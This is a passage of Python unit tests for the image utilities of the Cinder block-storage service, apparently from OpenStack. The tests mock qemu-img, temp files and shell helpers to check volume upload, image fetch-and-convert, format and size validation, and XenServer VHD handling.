    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('os.makedirs')
    @mock.patch('os.path.exists', return_value=True)
    @mock.patch('cinder.image.image_utils.utils.tempdir')
    def test_conv_dir_exists(self, mock_tempdir, mock_exists, mock_make,
                             mock_conf):
        """An existing conversion dir is used without re-creating it."""
        mock_conf.image_conversion_dir = mock.sentinel.conv_dir
        output = image_utils.temporary_dir()
        # os.path.exists is True, so no mkdir should happen.
        self.assertFalse(mock_make.called)
        mock_tempdir.assert_called_once_with(dir=mock.sentinel.conv_dir)
        self.assertEqual(mock_tempdir.return_value, output)

    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('os.makedirs')
    @mock.patch('os.path.exists', return_value=False)
    @mock.patch('cinder.image.image_utils.utils.tempdir')
    def test_create_conv_dir(self, mock_tempdir, mock_exists, mock_make,
                             mock_conf):
        """A configured but missing conversion dir is created first."""
        mock_conf.image_conversion_dir = mock.sentinel.conv_dir
        output = image_utils.temporary_dir()
        mock_make.assert_called_once_with(mock.sentinel.conv_dir)
        mock_tempdir.assert_called_once_with(dir=mock.sentinel.conv_dir)
        self.assertEqual(mock_tempdir.return_value, output)

    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('os.makedirs')
    @mock.patch('os.path.exists', return_value=False)
    @mock.patch('cinder.image.image_utils.utils.tempdir')
    def test_no_conv_dir(self, mock_tempdir, mock_exists, mock_make,
                         mock_conf):
        """With no conversion dir configured, tempdir gets dir=None."""
        mock_conf.image_conversion_dir = None
        output = image_utils.temporary_dir()
        # Nothing to create when no directory is configured.
        self.assertFalse(mock_make.called)
        mock_tempdir.assert_called_once_with(dir=None)
        self.assertEqual(mock_tempdir.return_value, output)
class TestUploadVolume(test.TestCase):
    """Tests for image_utils.upload_volume format conversion + upload."""

    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.fileutils.file_open')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.os')
    def test_diff_format(self, mock_os, mock_temp, mock_convert, mock_info,
                         mock_open, mock_conf):
        """A non-raw target format triggers conversion to a temp file."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_meta = {'id': 'test_id',
                      'disk_format': mock.sentinel.disk_format}
        volume_path = mock.sentinel.volume_path
        mock_os.name = 'posix'
        data = mock_info.return_value
        # Post-conversion format matches the requested disk_format.
        data.file_format = mock.sentinel.disk_format
        data.backing_file = None
        temp_file = mock_temp.return_value.__enter__.return_value
        output = image_utils.upload_volume(ctxt, image_service, image_meta,
                                           volume_path)
        self.assertIsNone(output)
        mock_convert.assert_called_once_with(volume_path,
                                             temp_file,
                                             mock.sentinel.disk_format,
                                             run_as_root=True)
        # qemu_img_info is consulted before and after conversion.
        mock_info.assert_called_with(temp_file, run_as_root=True)
        self.assertEqual(2, mock_info.call_count)
        mock_open.assert_called_once_with(temp_file, 'rb')
        image_service.update.assert_called_once_with(
            ctxt, image_meta['id'], {},
            mock_open.return_value.__enter__.return_value)

    @mock.patch('cinder.image.image_utils.utils.temporary_chown')
    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.fileutils.file_open')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.os')
    def test_same_format(self, mock_os, mock_temp, mock_convert, mock_info,
                         mock_open, mock_conf, mock_chown):
        """Raw images upload directly, with a chown when not readable."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_meta = {'id': 'test_id',
                      'disk_format': 'raw'}
        volume_path = mock.sentinel.volume_path
        mock_os.name = 'posix'
        # os.access returning False forces the temporary_chown path.
        mock_os.access.return_value = False
        output = image_utils.upload_volume(ctxt, image_service, image_meta,
                                           volume_path)
        self.assertIsNone(output)
        # No conversion or inspection is needed for an already-raw volume.
        self.assertFalse(mock_convert.called)
        self.assertFalse(mock_info.called)
        mock_chown.assert_called_once_with(volume_path)
        mock_open.assert_called_once_with(volume_path)
        image_service.update.assert_called_once_with(
            ctxt, image_meta['id'], {},
            mock_open.return_value.__enter__.return_value)

    @mock.patch('cinder.image.image_utils.utils.temporary_chown')
    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.fileutils.file_open')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.os')
    def test_same_format_on_nt(self, mock_os, mock_temp, mock_convert,
                               mock_info, mock_open, mock_conf, mock_chown):
        """On Windows ('nt') raw volumes are opened in binary mode."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_meta = {'id': 'test_id',
                      'disk_format': 'raw'}
        volume_path = mock.sentinel.volume_path
        mock_os.name = 'nt'
        mock_os.access.return_value = False
        output = image_utils.upload_volume(ctxt, image_service, image_meta,
                                           volume_path)
        self.assertIsNone(output)
        self.assertFalse(mock_convert.called)
        self.assertFalse(mock_info.called)
        # Note the explicit 'rb' mode, unlike the posix branch.
        mock_open.assert_called_once_with(volume_path, 'rb')
        image_service.update.assert_called_once_with(
            ctxt, image_meta['id'], {},
            mock_open.return_value.__enter__.return_value)

    @mock.patch('cinder.image.image_utils.CONF')
    @mock.patch('cinder.image.image_utils.fileutils.file_open')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.os')
    def test_convert_error(self, mock_os, mock_temp, mock_convert, mock_info,
                           mock_open, mock_conf):
        """A conversion that yields the wrong format aborts the upload."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_meta = {'id': 'test_id',
                      'disk_format': mock.sentinel.disk_format}
        volume_path = mock.sentinel.volume_path
        mock_os.name = 'posix'
        data = mock_info.return_value
        # The converted file reports a different format than requested.
        data.file_format = mock.sentinel.other_disk_format
        data.backing_file = None
        temp_file = mock_temp.return_value.__enter__.return_value
        self.assertRaises(exception.ImageUnacceptable,
                          image_utils.upload_volume,
                          ctxt, image_service, image_meta, volume_path)
        mock_convert.assert_called_once_with(volume_path,
                                             temp_file,
                                             mock.sentinel.disk_format,
                                             run_as_root=True)
        mock_info.assert_called_with(temp_file, run_as_root=True)
        self.assertEqual(2, mock_info.call_count)
        # The image must not be updated when verification fails.
        self.assertFalse(image_service.update.called)
class TestFetchToVhd(test.TestCase):
    """Tests for the fetch_to_vhd convenience wrapper."""

    @mock.patch('cinder.image.image_utils.fetch_to_volume_format')
    def test_defaults(self, mock_fetch_to):
        """Without kwargs the wrapper requests 'vpc' with default args."""
        ret = image_utils.fetch_to_vhd(mock.sentinel.context,
                                       mock.sentinel.image_service,
                                       mock.sentinel.image_id,
                                       mock.sentinel.dest,
                                       mock.sentinel.blocksize)
        self.assertIsNone(ret)
        mock_fetch_to.assert_called_once_with(mock.sentinel.context,
                                              mock.sentinel.image_service,
                                              mock.sentinel.image_id,
                                              mock.sentinel.dest, 'vpc',
                                              mock.sentinel.blocksize,
                                              None, None,
                                              run_as_root=True)

    @mock.patch('cinder.image.image_utils.fetch_to_volume_format')
    def test_kwargs(self, mock_fetch_to):
        """user_id, project_id and run_as_root are forwarded unchanged."""
        ret = image_utils.fetch_to_vhd(
            mock.sentinel.context, mock.sentinel.image_service,
            mock.sentinel.image_id, mock.sentinel.dest,
            mock.sentinel.blocksize, user_id=mock.sentinel.user_id,
            project_id=mock.sentinel.project_id,
            run_as_root=mock.sentinel.run_as_root)
        self.assertIsNone(ret)
        mock_fetch_to.assert_called_once_with(
            mock.sentinel.context, mock.sentinel.image_service,
            mock.sentinel.image_id, mock.sentinel.dest, 'vpc',
            mock.sentinel.blocksize, mock.sentinel.user_id,
            mock.sentinel.project_id,
            run_as_root=mock.sentinel.run_as_root)
class TestFetchToRaw(test.TestCase):
    """Tests for the fetch_to_raw convenience wrapper."""

    @mock.patch('cinder.image.image_utils.fetch_to_volume_format')
    def test_defaults(self, mock_fetch_to):
        """Without kwargs the wrapper requests 'raw' with default args."""
        ret = image_utils.fetch_to_raw(mock.sentinel.context,
                                       mock.sentinel.image_service,
                                       mock.sentinel.image_id,
                                       mock.sentinel.dest,
                                       mock.sentinel.blocksize)
        self.assertIsNone(ret)
        mock_fetch_to.assert_called_once_with(mock.sentinel.context,
                                              mock.sentinel.image_service,
                                              mock.sentinel.image_id,
                                              mock.sentinel.dest, 'raw',
                                              mock.sentinel.blocksize,
                                              None, None, None,
                                              run_as_root=True)

    @mock.patch('cinder.image.image_utils.fetch_to_volume_format')
    def test_kwargs(self, mock_fetch_to):
        """user_id, project_id, size and run_as_root pass straight through."""
        ret = image_utils.fetch_to_raw(
            mock.sentinel.context, mock.sentinel.image_service,
            mock.sentinel.image_id, mock.sentinel.dest,
            mock.sentinel.blocksize, user_id=mock.sentinel.user_id,
            project_id=mock.sentinel.project_id, size=mock.sentinel.size,
            run_as_root=mock.sentinel.run_as_root)
        self.assertIsNone(ret)
        mock_fetch_to.assert_called_once_with(
            mock.sentinel.context, mock.sentinel.image_service,
            mock.sentinel.image_id, mock.sentinel.dest, 'raw',
            mock.sentinel.blocksize, mock.sentinel.user_id,
            mock.sentinel.project_id, mock.sentinel.size,
            run_as_root=mock.sentinel.run_as_root)
class TestFetchToVolumeFormat(test.TestCase):
    """Tests for image_utils.fetch_to_volume_format download + convert."""

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_defaults(self, mock_conf, mock_temp, mock_info, mock_fetch,
                      mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
        """Happy path: fetch to a temp file and convert to the target."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        data = mock_info.return_value
        data.file_format = volume_format
        data.backing_file = None
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        output = image_utils.fetch_to_volume_format(ctxt, image_service,
                                                    image_id, dest,
                                                    volume_format, blocksize)
        self.assertIsNone(output)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        # Inspected twice on the temp file (pre/post fetch), once on dest.
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=True),
            mock.call(tmp, run_as_root=True),
            mock.call(dest, run_as_root=True)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, None, None)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        mock_convert.assert_called_once_with(tmp, dest, volume_format,
                                             run_as_root=True)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_kwargs(self, mock_conf, mock_temp, mock_info, mock_fetch,
                    mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
        """All optional kwargs are threaded through to the helpers."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = volume_format
        data.backing_file = None
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        output = image_utils.fetch_to_volume_format(
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        self.assertIsNone(output)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(dest, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        mock_convert.assert_called_once_with(tmp, dest, volume_format,
                                             run_as_root=run_as_root)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info',
                side_effect=processutils.ProcessExecutionError)
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_no_qemu_img_and_is_raw(self, mock_conf, mock_temp, mock_info,
                                    mock_fetch, mock_is_xen, mock_repl_xen,
                                    mock_copy, mock_convert):
        """Without qemu-img, a raw image is block-copied instead."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        tmp = mock_temp.return_value.__enter__.return_value
        image_service.show.return_value = {'disk_format': 'raw',
                                           'size': 41126400}
        # copy_volume takes the size in whole MiB, rounded up.
        image_size_m = math.ceil(41126400 / units.Mi)
        output = image_utils.fetch_to_volume_format(
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        self.assertIsNone(output)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        mock_copy.assert_called_once_with(tmp, dest, image_size_m,
                                          blocksize)
        # No conversion is possible (or needed) without qemu-img.
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info',
                side_effect=processutils.ProcessExecutionError)
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_no_qemu_img_not_raw(self, mock_conf, mock_temp, mock_info,
                                 mock_fetch, mock_is_xen, mock_repl_xen,
                                 mock_copy, mock_convert):
        """Without qemu-img, a non-raw image cannot be handled."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        tmp = mock_temp.return_value.__enter__.return_value
        image_service.show.return_value = {'disk_format': 'not_raw'}
        self.assertRaises(
            exception.ImageUnacceptable,
            image_utils.fetch_to_volume_format,
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
        # The failure happens before any download or copy is attempted.
        self.assertFalse(mock_fetch.called)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info',
                side_effect=processutils.ProcessExecutionError)
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_no_qemu_img_no_metadata(self, mock_conf, mock_temp, mock_info,
                                     mock_fetch, mock_is_xen, mock_repl_xen,
                                     mock_copy, mock_convert):
        """Without qemu-img and without image metadata, the fetch fails."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        tmp = mock_temp.return_value.__enter__.return_value
        image_service.show.return_value = None
        self.assertRaises(
            exception.ImageUnacceptable,
            image_utils.fetch_to_volume_format,
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_called_once_with(tmp, run_as_root=run_as_root)
        self.assertFalse(mock_fetch.called)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_size_error(self, mock_conf, mock_temp, mock_info, mock_fetch,
                        mock_is_xen, mock_repl_xen, mock_copy, mock_convert):
        """A virtual size larger than the requested size is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 1234
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = volume_format
        data.backing_file = None
        # Far larger than the requested size of 1234.
        data.virtual_size = 4321 * 1024 ** 3
        tmp = mock_temp.return_value.__enter__.return_value
        self.assertRaises(
            exception.ImageUnacceptable,
            image_utils.fetch_to_volume_format,
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_qemu_img_parse_error(self, mock_conf, mock_temp, mock_info,
                                  mock_fetch, mock_is_xen, mock_repl_xen,
                                  mock_copy, mock_convert):
        """Unparseable qemu-img output (no file_format) is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = None
        data.backing_file = None
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        self.assertRaises(
            exception.ImageUnacceptable,
            image_utils.fetch_to_volume_format,
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_backing_file_error(self, mock_conf, mock_temp, mock_info,
                                mock_fetch, mock_is_xen, mock_repl_xen,
                                mock_copy, mock_convert):
        """A downloaded image with a backing file is rejected."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = volume_format
        data.backing_file = mock.sentinel.backing_file
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        self.assertRaises(
            exception.ImageUnacceptable,
            image_utils.fetch_to_volume_format,
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        self.assertFalse(mock_convert.called)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=False)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def _test_format_name_mismatch(self, mock_conf, mock_temp, mock_info,
                                   mock_fetch, mock_is_xen, mock_repl_xen,
                                   mock_copy, mock_convert,
                                   legacy_format_name=False):
        """Shared body for the format-name-mismatch tests below.

        legacy_format_name=True simulates qemu-img reporting the legacy
        'vpc' name when 'vhd' was requested, which must be accepted;
        any other mismatch must raise ImageUnacceptable.
        """
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = 'vhd'
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = 'vpc' if legacy_format_name else 'raw'
        data.backing_file = None
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        if legacy_format_name:
            image_utils.fetch_to_volume_format(
                ctxt, image_service, image_id, dest, volume_format, blocksize,
                user_id=user_id, project_id=project_id, size=size,
                run_as_root=run_as_root)
        else:
            self.assertRaises(
                exception.ImageUnacceptable,
                image_utils.fetch_to_volume_format,
                ctxt, image_service, image_id, dest, volume_format, blocksize,
                user_id=user_id, project_id=project_id, size=size,
                run_as_root=run_as_root)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(dest, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        self.assertFalse(mock_repl_xen.called)
        self.assertFalse(mock_copy.called)
        mock_convert.assert_called_once_with(tmp, dest, volume_format,
                                             run_as_root=run_as_root)

    def test_format_mismatch(self):
        """A genuinely different output format raises ImageUnacceptable."""
        self._test_format_name_mismatch()

    def test_format_name_mismatch_same_format(self):
        # Make sure no exception is raised because of qemu-img still using
        # the legacy 'vpc' format name if 'vhd' is requested.
        self._test_format_name_mismatch(legacy_format_name=True)

    @mock.patch('cinder.image.image_utils.convert_image')
    @mock.patch('cinder.image.image_utils.volume_utils.copy_volume')
    @mock.patch(
        'cinder.image.image_utils.replace_xenserver_image_with_coalesced_vhd')
    @mock.patch('cinder.image.image_utils.is_xenserver_image',
                return_value=True)
    @mock.patch('cinder.image.image_utils.fetch')
    @mock.patch('cinder.image.image_utils.qemu_img_info')
    @mock.patch('cinder.image.image_utils.temporary_file')
    @mock.patch('cinder.image.image_utils.CONF')
    def test_xenserver_to_vhd(self, mock_conf, mock_temp, mock_info,
                              mock_fetch, mock_is_xen, mock_repl_xen,
                              mock_copy, mock_convert):
        """XenServer images get their VHD chain coalesced before convert."""
        ctxt = mock.sentinel.context
        image_service = mock.Mock()
        image_id = mock.sentinel.image_id
        dest = mock.sentinel.dest
        volume_format = mock.sentinel.volume_format
        blocksize = mock.sentinel.blocksize
        user_id = mock.sentinel.user_id
        project_id = mock.sentinel.project_id
        size = 4321
        run_as_root = mock.sentinel.run_as_root
        data = mock_info.return_value
        data.file_format = volume_format
        data.backing_file = None
        data.virtual_size = 1234
        tmp = mock_temp.return_value.__enter__.return_value
        output = image_utils.fetch_to_volume_format(
            ctxt, image_service, image_id, dest, volume_format, blocksize,
            user_id=user_id, project_id=project_id, size=size,
            run_as_root=run_as_root)
        self.assertIsNone(output)
        image_service.show.assert_called_once_with(ctxt, image_id)
        mock_temp.assert_called_once_with()
        mock_info.assert_has_calls([
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(tmp, run_as_root=run_as_root),
            mock.call(dest, run_as_root=run_as_root)])
        mock_fetch.assert_called_once_with(ctxt, image_service, image_id,
                                           tmp, user_id, project_id)
        # The XenServer-specific coalescing step runs on the temp file.
        mock_repl_xen.assert_called_once_with(tmp)
        self.assertFalse(mock_copy.called)
        mock_convert.assert_called_once_with(tmp, dest, volume_format,
                                             run_as_root=run_as_root)
class TestXenserverUtils(test.TestCase):
    """Tests for the XenServer image-format helper functions."""

    @mock.patch('cinder.image.image_utils.is_xenserver_format')
    def test_is_xenserver_image(self, mock_format):
        """is_xenserver_image looks up the metadata and delegates."""
        svc = mock.Mock()
        result = image_utils.is_xenserver_image(
            mock.sentinel.context, svc, mock.sentinel.image_id)
        svc.show.assert_called_once_with(mock.sentinel.context,
                                         mock.sentinel.image_id)
        mock_format.assert_called_once_with(svc.show.return_value)
        self.assertEqual(mock_format.return_value, result)

    def test_is_xenserver_format(self):
        """Only the vhd/ovf combination counts as a XenServer image."""
        self.assertTrue(image_utils.is_xenserver_format(
            {'disk_format': 'vhd', 'container_format': 'ovf'}))
        self.assertFalse(image_utils.is_xenserver_format(
            {'disk_format': 'test_disk_format',
             'container_format': 'test_cont_format'}))

    @mock.patch('cinder.image.image_utils.utils.execute')
    def test_extract_targz(self, mock_exec):
        """extract_targz shells out to tar -xzf and returns None."""
        result = image_utils.extract_targz(mock.sentinel.archive_name,
                                           mock.sentinel.target)
        mock_exec.assert_called_once_with('tar', '-xzf',
                                          mock.sentinel.archive_name,
                                          '-C', mock.sentinel.target)
        self.assertIsNone(result)
class TestVhdUtils(test.TestCase):
    """Tests for the vhd-util based helpers in image_utils."""

    @mock.patch('cinder.image.image_utils.utils.execute')
    def test_set_vhd_parent(self, mock_exec):
        # set_vhd_parent() rewrites the parent pointer via `vhd-util modify`.
        child = mock.sentinel.vhd_path
        parent = mock.sentinel.parentpath
        result = image_utils.set_vhd_parent(child, parent)
        mock_exec.assert_called_once_with('vhd-util', 'modify', '-n', child,
                                          '-p', parent)
